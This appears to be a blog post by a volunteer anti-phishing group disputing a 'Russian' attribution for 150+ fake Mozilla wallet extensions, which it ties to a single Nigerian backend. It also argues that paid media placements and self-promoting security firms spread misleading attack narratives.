150+ Fake Mozilla Extensions — One Backend & Paid Media

The Misleading Narrative

A story about "150+ fake Mozilla extensions" tied to a supposed "Russian trail" was amplified across major crypto and security outlets. It sounds dramatic, but our analysis shows this narrative is misleading — and worse, it shields the real perpetrators.

150+ Low-Quality Extensions on a Single Backend

All extensions in this campaign were:

• Non-unique, copy-paste quality.
• Only logos and names varied.
• All connected to a single backend.

Our Actions Against This Campaign

As a volunteer threat intelligence group specializing in phishing and scam infrastructure takedowns, we:

• Submitted reports directly to Mozilla to flag malicious extensions.
• Escalated to Seal, requesting professional assistance to accelerate banning.
• Published a report on Chainabuse for community visibility.
• Injected millions of empty seed phrases into the attackers' backend to pollute stolen data.

Why This Is Not "Russian" Infrastructure

Russian-speaking threat actors typically use:

• Distributed backends (Cloudflare Workers, Firebase, Amazon, unique links per campaign).
• Obfuscation and redundancy to avoid single points of failure.

Instead, this campaign showed:

• A Nigerian hosting provider.
• Neighboring domains tied to bank scams, fake crypto wallets, fake delivery scams.
• A Telegram account receiving stolen data linked to a Nigerian operator.

The Paid Media Problem

Paid media placements create serious consequences:

1. One paid article in a respected outlet gets published.
2. Hundreds of smaller sites, blogs, and Telegram channels rewrite or translate it.
3. Within days, it becomes a massive fake narrative with the illusion of credibility.

Example: Angel Drainer

Every major outlet ran headlines about "Angel Drainer shutdown after devs identified." But was it true — or just another paid placement repeated until it looked credible? For criminals, buying articles is pocket change; for victims, it changes everything.

Cybersecurity Companies Buying Their Own PR

Cybersecurity companies pay tens of thousands of dollars for articles about themselves, their research, and their impact. This raises fundamental questions:

• Why does a real cybersecurity group need to pay for coverage?
• Are they trying to bury the real hacker's trail?
• Or leverage the hacker's identity for blackmail or competitive gain?
• Is the purpose to strengthen trust — or manipulate perception for profit?

Evidence of the Market

The practice is not hidden:

• On Fiverr, Upwork, and specialized PR markets, you can directly purchase "guest posts."
• Providers send Google Sheets with dozens of outlets and prices — including well-known cybersecurity brands.
• Some promise: "for an extra fee, no sponsored label."

Stated goals for buying articles include:

• Link Building (SEO).
• Traffic & Sales.
• Brand Awareness.
• Reputation Management (burying negatives).
• Social Verification.
• Publication Lists for Visa Applications.

Costs mentioned include over $20,000 for paid interview slots from major crypto media outlets.

Business vs. Lies

Publishing paid content is not illegal — it's business. But when it crosses into publishing false claims, misdirecting investigations, and disguising PR as fact, it becomes part of the problem.

Conclusion

PhishDestroy is a volunteer cybersecurity initiative that doesn't get paid, sell ads, or profit. The facts are clear:

• 150+ Mozilla extensions routed to a single backend on Nigerian hosting.
• Data went to a Nigerian Telegram account.
• The "Russian trail" narrative is fabricated.
• Paid media coverage amplified this fabrication until it looked like truth.
• Even cybersecurity companies themselves pay for self-promotion.

Disclaimer

We are not accusing any individual, company, or media outlet. All facts are open-source and verifiable through public archives, scanners, and reports. The real question: why are such narratives controlled and amplified? Who benefits when an unknown security company publishes an inaccurate mega-investigation that shifts attention away from real actors?